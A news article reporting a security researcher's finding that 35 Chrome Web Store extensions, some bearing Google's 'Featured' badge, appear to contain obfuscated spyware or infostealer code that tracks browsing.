You'd be forgiven for thinking that if you downloaded a Google Chrome extension from the official Chrome Web Store, it was likely to be above board. Not so, according to the founder of browser extension security platform Secure Annex, who claims he's identified 35 Chrome extensions with 4 million total installs that he concludes 'include some kind of spyware or infostealer.'
The accused extensions have several things in common. They use many of the same code patterns, connect to many of the same servers, and require the same system permissions (via Ars Technica). However, John Tuckner, founder of cybersecurity firm Secure Annex, also found they use obfuscated code that looks designed to conceal their behaviour.
"These extensions have some strong relations and most claim to actually perform some purpose like ad blocking, extension protection, better search results, or privacy protection which likely keeps them available in the web store", says Tuckner.
"While all are different, the code for their claimed purpose is often very minimal or missing entirely."
In the case of one particular example, Fire Shield Extension Protection, running it on a lab device resulted in a blank webpage, while clicking the options menu appeared to do nothing. Chrome developer tools revealed that the extension connected to a URL and performed a generic "browser_action_clicked" response, but nothing further.
Using a unique extension ID found on GitHub, Tuckner was able to observe Fire Shield sending a variety of events to a web server, tracking what websites he was visiting, which he had visited previously, and the size of his display.
"While I could not find an instance of the [Fire Shield] extension exfiltrating credentials, this level of obfuscation alone, the ability for the extension’s configuration to be remotely controlled, and the capabilities in the browser extension’s code is enough for me to come to the same conclusion that all of these extensions include some kind of spyware or infostealer" says Tuckner.
Tuckner says that he identified 35 extensions using "eerily similar names" and with distinct similarities. 34 of them reference a mysterious "unknow.com" in their background service listings.
All but one of the identified extensions are unlisted, meaning that you'd have to click on a link directly to go to its Chrome store page. Nevertheless, 10 of the accused extensions are given the "Featured" badge by Google. As Tuckner opines:
Best gaming PC: The top pre-built machines.
Best gaming laptop: Great devices for mobile gaming.
"Why are some of these extensions selected to be 'Featured' by Google when they are not discoverable by normal users?
"This blows my mind. Any normal user might interpret that status as the extension being verified and reputable. It should absolutely not be possible to be 'Featured' and not discoverable at the same time."
Indeed. You can find the full list of extensions identified by Tucker as potentially malicious at the bottom of the Ars Technica article. Many of them have names like Incognito Shield, Privacy Guard, and Total Safety, so if you're using a Chrome extension to protect your online presence, it's worth taking a look to see if you have some serious cleaning up to do.
You must confirm your public display name before commenting
Please logout and then login again, you will then be prompted to enter your display name.
